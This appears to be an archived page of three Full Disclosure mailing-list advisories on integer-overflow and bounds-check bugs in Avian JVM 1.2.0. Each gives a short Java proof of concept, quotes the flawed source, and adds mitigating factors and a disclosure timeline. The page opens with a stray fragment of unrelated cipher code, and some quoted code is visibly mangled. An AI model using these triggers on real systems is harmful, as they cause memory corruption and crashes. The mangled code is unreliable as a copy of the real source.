ciphertext, ciphertextOffset);
cipher.doFinal(ciphertext, ciphertextOffset + result);
} catch (InvalidKeyException e) {
// Shouldn't happen.
throw new IllegalStateException(e);
} catch (InvalidAlgorithmParameterException e) {
// Shouldn't happen.
throw new IllegalStateException(e);
} catch (IllegalBlockSizeException e) {
// Shouldn't happen.

[FD] Avian JVM vm::arrayCopy() Multiple Integer Overflows

2020-08-11 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Avian JVM vm::arrayCopy() Multiple Integer Overflows
Author: Pietro Oliva
CVE: CVE-2020-17360
Vendor: ReadyTalk
Product: Avian JVM 
Affected version: 1.2.0

The issue is located in the vm::arrayCopy method defined in classpath-common.h,
where multiple boundary checks are performed to prevent out-of-bounds memory
read/write. Two of those boundary checks contain an integer overflow which leads
to those same checks being bypassed and out-of-bounds read/write.   

Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory 
disclosure, or arbitrary code execution in the context of the JVM.

The following PoC would trigger an out-of-bounds write and crash of Avian JVM:

import java.lang.*;

public class poc {

public static void main(String[] args) {
byte[] src = "This is src".getBytes();
byte[] dst = "This is dst".getBytes();

// Triggering out-of-bounds write via integer overflow on 
System.arraycopy(src, 0, dst, 0x7fff, 1);


void arrayCopy(Thread* t,
   object src,
   int32_t srcOffset,
   object dst,
   int32_t dstOffset,
   int32_t length)
  if (LIKELY(src and dst)) {
if (LIKELY(compatibleArrayTypes(
t, objectClass(t, src), objectClass(t, dst {
  unsigned elementSize = objectClass(t, src)->arrayElementSize();

  if (LIKELY(elementSize)) {
intptr_t sl = fieldAtOffset(src, BytesPerWord);
intptr_t dl = fieldAtOffset(dst, BytesPerWord);
if (LIKELY(length > 0)) {
  if (LIKELY(srcOffset >= 0 and srcOffset + length <= sl // integer OF
/*integer overflow*/ and dstOffset >= 0 and dstOffset + length <= dl)) {
uint8_t* sbody = (src, ArrayBody);
uint8_t* dbody = (dst, ArrayBody);
if (src == dst) {
  memmove(dbody + (dstOffset * elementSize),
  sbody + (srcOffset * elementSize),
  length * elementSize);
} else {
  memcpy(dbody + (dstOffset * elementSize),
 sbody + (srcOffset * elementSize),
 length * elementSize);

if (objectClass(t, dst)->objectMask()) {
  mark(t, dst, ArrayBody + (dstOffset * BytesPerWord), length);

  } else {
throwNew(t, GcIndexOutOfBoundsException::Type);
} else {
  } else {
throwNew(t, GcNullPointerException::Type);

  throwNew(t, GcArrayStoreException::Type);

As can be seen in the two lines commented above, offset+length can overflow and
the size checks would be bypassed. Overflowing srcOffset+length would trigger an
out-of-bounds read in either memmove or memcpy, while overflowing dstOffset + 
length would trigger an out-of-bounds write in the same methods.

Mitigating factors:
Since both offsets and length need to be positive integers, there is a limited
range of memory where an attacker could read or write as a result of this

A patch has been merged in the master branch:

Disclosure timeline:
3rd August 2020  -  Vulnerability reported.
3rd August 2020  -  Vulnerability acknowledged.
4th August 2020  -  CVE request sent to Mitre.
5th August 2020  -  CVE assigned.
10th August 2020 -  Proposed patch via pull request.
10th August 2020 -  Patch approved and merged after changes.
10th August 2020 -  Vulnerability details shared on fulldisclosure.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Avian JVM vm::arrayCopy() silent return on negative length

2020-08-11 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Avian JVM vm::arrayCopy() silent return on negative length
Author: Pietro Oliva
CVE: CVE-2020-17361
Vendor: ReadyTalk
Product: Avian JVM 
Affected version: 1.2.0 

The issue is located in the vm::arrayCopy method defined in classpath-common.h,
where multiple boundary checks are performed to prevent out-of-bounds memory
read/write. One of these boundary checks makes the code return silently when a
negative length is provided instead of throwing an exception.   

The caller could assume that the method has succeeded in the copy operation due
to the lack of exception being thrown for negative lengths. This could result 
in data being lost during the copy, with varying consequences depending on the
subsequent use of the destination buffer.  

The following PoC should throw an exception, but it silently returns instead:

import java.lang.*;

public class poc {

public static void main(String[] args) {
byte[] src = "This is src".getBytes();
byte[] dst = "This is dst".getBytes();

// This should throw an exception, but it doesn't and it silently 
returns intead.
System.arraycopy(src, 0, dst, 0, -1);


void arrayCopy(Thread* t,
   object src,
   int32_t srcOffset,
   object dst,
   int32_t dstOffset,
   int32_t length)
  if (LIKELY(src and dst)) {
if (LIKELY(compatibleArrayTypes(
t, objectClass(t, src), objectClass(t, dst {
  unsigned elementSize = objectClass(t, src)->arrayElementSize();

  if (LIKELY(elementSize)) {
intptr_t sl = fieldAtOffset(src, BytesPerWord);
intptr_t dl = fieldAtOffset(dst, BytesPerWord);
if (LIKELY(length > 0)) {
  if (LIKELY(srcOffset >= 0 and srcOffset + length <= sl
 and dstOffset >= 0 and dstOffset + length <= dl)) {
uint8_t* sbody = (src, ArrayBody);
uint8_t* dbody = (dst, ArrayBody);
if (src == dst) {
  memmove(dbody + (dstOffset * elementSize),
  sbody + (srcOffset * elementSize),
  length * elementSize);
} else {
  memcpy(dbody + (dstOffset * elementSize),
 sbody + (srcOffset * elementSize),
 length * elementSize);

if (objectClass(t, dst)->objectMask()) {
  mark(t, dst, ArrayBody + (dstOffset * BytesPerWord), length);

  } else {
throwNew(t, GcIndexOutOfBoundsException::Type);
} else {
  return; // No exceptions are thrown for negative lengths 
  } else {
throwNew(t, GcNullPointerException::Type);

  throwNew(t, GcArrayStoreException::Type);

As can be seen in the line commented above, no exceptions are thrown for
negative lengths.

A patch has been merged in the master branch:

Disclosure timeline:
3rd August 2020  -  Vulnerability reported.
3rd August 2020  -  Vulnerability acknowledged.
4th August 2020  -  CVE request sent to Mitre.
5th August 2020  -  CVE assigned.
10th August 2020 -  Proposed patch via pull request.
10th August 2020 -  Patch approved and merged after changes.
10th August 2020 -  Vulnerability details shared on fulldisclosure.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Avian JVM FileOutputStream.write() Integer Overflow

2020-11-12 Thread Pietro Oliva via Fulldisclosure
Vulnerability title: Avian JVM FileOutputStream.write() Integer Overflow
Author: Pietro Oliva
Vendor: ReadyTalk
Product: Avian JVM 
Affected version: 1.2.0 before 27th October 2020
Fixed Version: 1.2.0 since 27th October 2020

The issue is located in the FileOutputStream.write() method defined in
FileOutputStream.java, where a boundary check is performed in order to prevent
out-of-bounds memory read/write. However, this check contained an integer 
overflow which leads to the same check being bypassed and out-of-bounds 

Attackers could exploit this vulnerability to read/write arbitrary content in
the JVM memory. This could in turn result in denial of service, memory 
disclosure, or arbitrary code execution in the context of the JVM.

The following PoC would trigger an OOB read/write and/or crash of Avian JVM:

import java.io.IOException;
import java.io.FileDescriptor;
import java.io.FileOutputStream;

public class poc {

  public static void main(String[] args) throws IOException {
  byte[] data = "somedata".getBytes();
  FileDescriptor fd = new FileDescriptor().out;
  FileOutputStream fos = new FileOutputStream(fd);

  fos.write(data, 1, 0x7fff); // Integer overflow + OOB read/write here


public void write(byte[] b, int offset, int length) throws IOException {
  if (b == null) {
throw new NullPointerException();

  if (offset < 0 || offset + length > b.length) { // Integer overflow here
throw new ArrayIndexOutOfBoundsException();

  write(fd, b, offset, length);

Java_java_io_FileOutputStream_write__I_3BII(JNIEnv* e,
jint fd,
jbyteArray b,
jint offset,
jint length)
  jbyte* data = static_cast(malloc(length));

  if (data == 0) {
throwNew(e, "java/lang/OutOfMemoryError", 0);

  e->GetByteArrayRegion(b, offset, length, data);
  if (not e->ExceptionCheck()) {
doWrite(e, fd, data, length);


void JNICALL GetByteArrayRegion(Thread* t,
jbyteArray array,
jint offset,
jint length,
jbyte* dst)
  ENTER(t, Thread::ActiveState);

  if (length) {
// Out-of-bounds read/write here
memcpy(dst, &(*array)->body()[offset], length * sizeof(jbyte));

As can be observed above, offset+length can overflow in FileOutputStream.write()
and later result in OOB read/write during memcpy() in GetByteArrayRegion().   

Mitigating factors:
Since offset needs to be a positive integer, and length is limited to a valid
malloc argument, there is a limited range of memory where an attacker could read
or write as a result of this vulnerability.


A fix has been made available with the following commit:

Disclosure timeline:
20th October 2020  -  Vulnerability reported.
20th October 2020  -  Vulnerability acknowledged.
20th October 2020  -  CVE request sent to Mitre.
23rd October 2020  -  Sent reminder to Mitre.
27th October 2020  -  Sent reminder to Mitre.
27th October 2020  -  Patch proposed via pull request.
27th October 2020  -  Patch merged into master branch.
29th October 2020  -  Sent reminder to Mitre.
2nd November 2020  -  CVE request sent again to Mitre.
11th November 2020  - Vulnerability details shared on fulldisclosure without 
CVE identifier.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/